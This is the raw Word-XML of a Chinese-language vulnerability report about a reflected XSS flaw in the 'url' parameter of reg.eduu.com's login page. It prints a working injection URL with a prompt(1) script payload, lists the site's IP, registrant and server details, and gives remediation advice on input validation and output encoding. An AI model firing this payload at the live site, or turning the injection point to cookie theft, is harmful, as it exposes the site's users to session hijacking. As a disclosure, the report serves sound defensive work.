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基本信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞类型：XSS跨站注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞等级：中危</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>厂商信息：此处需要手动搜索</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞简述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="DaHei"/>
      </w:pPr>
      <w:r>
        <w:t>跨站脚本攻击的英文全称是Cross Site Script，为了和样式表区分，缩写为XSS。发生的原因是网站将用户输入的内容输出到页面上，在这个过程中可能有恶意代码被浏览器执行。跨站脚本攻击,它指的是恶意攻击者往Web页面里插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html代码会被执行，从而达到恶意用户的特殊目的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞危害</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="DaHei"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        1.窃取cookies，读取目标网站的cookie发送到黑客的服务器上</w:t>
        <w:br/>
        <w:t xml:space="preserve">        2.读取用户未公开的资料，如果：邮件列表或者内容、系统的客户资料，联系人列表等等。</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞详情</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>网站漏洞报表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>注入网址:http://reg.eduu.com/login/?url=&lt;/script&gt;"&gt;&lt;script&gt;prompt(1)&lt;/script&gt;http://school.zhongkao.com/school/xxdp/249553/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞参数:url</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>请求方式:GET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>攻击载荷:&lt;/script&gt;"&gt;&lt;script&gt;prompt(1)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>网站信息报表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>百度权重  0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站主页  http://reg.eduu.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站描述  暂无信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站标题  家长帮通行证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>IP__坐标  北京市 通网网联(北京通管机房)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>所属__IP  122.112.13.54</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站年龄  点击查询</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案编号  京ICP备09042963号-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案性质  企业</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案名称  北京学而思网络科技有限公司</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案时间  2019/3/14 0:00:00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>百度收录  6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>协议类型  HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">页面类型   text/html; charset=utf-8  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">服务类型   nginx </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">程序语言   - </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>网站漏洞复现(使用Firefox浏览器)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="DaHei"/>
      </w:pPr>
      <w:r>
        <w:t>访问链接</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHOng"/>
      </w:pPr>
      <w:r>
        <w:t>http://reg.eduu.com/login/?url=&lt;/script&gt;"&gt;&lt;script&gt;prompt(1)&lt;/script&gt;http://school.zhongkao.com/school/xxdp/249553/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="DaHei"/>
      </w:pPr>
      <w:r>
        <w:t>返回结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="6400800" cy="50600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g.eduu.co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600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aHei"/>
      </w:pPr>
      <w:r>
        <w:t>复现完成，验证存在反射型XSS漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>代码原理防护</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="DaHei"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        1、</w:t>
        <w:tab/>
        <w:t>输入验证：某个数据被接受为可被显示或存储之前，使用标准输入验证机制，验证所有输入数据的长度、类型、语法以及业务规则。</w:t>
        <w:br/>
        <w:t xml:space="preserve">        2、</w:t>
        <w:tab/>
        <w:t>输出编码：数据输出前，确保用户提交的数据已被正确进行entity编码，建议对所有字符进行编码而不仅局限于某个子集。</w:t>
        <w:br/>
        <w:t xml:space="preserve">        3、</w:t>
        <w:tab/>
        <w:t>明确指定输出的编码方式：不要允许攻击者为你的用户选择编码方式(如ISO 8859-1或 UTF 8)。</w:t>
        <w:br/>
        <w:t xml:space="preserve">        4、</w:t>
        <w:tab/>
        <w:t>注意黑名单验证方式的局限性：仅仅查找或替换一些字符(如"&lt;" "&gt;"或类似"script"的关键字)，很容易被XSS变种攻击绕过验证机制。</w:t>
        <w:br/>
        <w:t xml:space="preserve">        5、</w:t>
        <w:tab/>
        <w:t>警惕规范化错误：验证输入之前，必须进行解码及规范化以符合应用程序当前的内部表示方法。请确定应用程序对同一输入不做两次解码。对客户端提交的数据进行过滤，一般建议过滤掉双引号（”）、尖括号（&lt;、&gt;）等特殊字符，或者对客户端提交的数据中包含的特殊字符进行实体转换，比如将双引号（”）转换成其实体形式&amp;quot;，&lt;对应的实体形式是&amp;lt;，&lt;对应的实体形式是&amp;gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">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aHei">
    <w:name w:val="DaHei"/>
    <w:rPr>
      <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋"/>
      <w:color w:val="000000"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ZhongHei">
    <w:name w:val="ZhongHei"/>
    <w:rPr>
      <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ZhongHOng">
    <w:name w:val="ZhongHOng"/>
    <w:rPr>
      <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋"/>
      <w:color w:val="B22222"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="XiaoLv">
    <w:name w:val="XiaoLv"/>
    <w:rPr>
      <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋"/>
      <w:color w:val="00FF00"/>
      <w:sz w:val="13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